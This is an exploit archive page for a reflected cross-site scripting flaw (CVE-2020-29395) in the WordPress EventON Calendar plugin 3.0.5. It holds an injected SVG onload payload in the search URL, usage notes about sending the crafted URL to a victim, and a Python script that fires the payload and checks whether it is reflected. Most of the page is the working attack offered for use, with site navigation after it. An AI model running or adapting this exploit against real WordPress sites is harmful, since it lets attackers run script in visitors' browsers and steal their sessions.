WordPress EventON Calendar 3.0.5 Cross Site Scripting

WordPress EventON Calendar 3.0.5 Cross Site Scripting: Posted Dec 1, 2020; Authored by B3KC4T; WordPress EventON Calendar plugin version 3.0.5 suffers from a cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2020-29395; SHA-256 | 4af51aa0bdaa4ea63ed2964de737d436288bb34b1b8fa463aa103c6073904e71; Download | Favorite | View

WordPress EventON Calendar 3.0.5 Cross Site Scripting

# Exploit Title: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting
# Date: 27.11.2020
# Exploit Author: b3kc4t (Mustafa GUNDOGDU)
# Vendor Homepage: https://www.myeventon.com/
# Version: 3.0.5
# Tested on: Ubuntu 18.04
# CVE : 2020-29395
# Description Link:
https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS

"""
                 ~ VULNERABLITY DETAILS ~
    
    https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>
    
    #
    WordPress sites that use EventOn Calendar cause reflected xss vulnerability to javascript payloads injected 
    into the search field.
    
    #
    The following python code will inject javascript code and print out url that will be sent to victim. 
    If you use unicode caracters for xss , exploit will print page source.

    ##USAGE##
    
    $ sudo python eventon_exploit.py --exploit --url https://target/addons/?q= --payload '<svg/onload=alert(/b3kc4t/)>'

    ##OUTPUT##

    [+] https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>


"""
import requests
import sys
import argparse
from colorama import Fore
        
def vuln_reflected(url, payload):

    s = requests.Session()
    get_request = s.get(url+payload)
    
    if get_request.status_code == 500:
        print(Fore.GREEN+"[-] COULD BE WAF, NOT BE REALIZED XSS INJECTION [-]")

    else:
        content_result = str(get_request.content)
        search_find = content_result.find(payload)

        if search_find != -1:
            print(Fore.GREEN+"[+] "+str(url)+str(payload))

        else:

            print(content_result)


def main():

    desc = "Wordpress EventON Calendar Plugin XSS"
    parser = argparse.ArgumentParser(description=desc)
    exp_option = parser.add_argument_group('')
    parser.add_argument("--exploit", help ="", action='store_true')
    parser.add_argument("--url",help="", type=str, required=False)
    parser.add_argument("--payload",help="",type=str,required=False)

    args = parser.parse_args()

    if args.exploit:

        if args.url:

            if args.payload:
                url = args.url
                payload = args.payload
                vuln_reflected(url, payload)

if name == 'main':
    main()

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

WordPress EventON Calendar 3.0.5 Cross Site Scripting

WordPress EventON Calendar 3.0.5 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress EventON Calendar 3.0.5 Cross Site Scripting

Share This

WordPress EventON Calendar 3.0.5 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems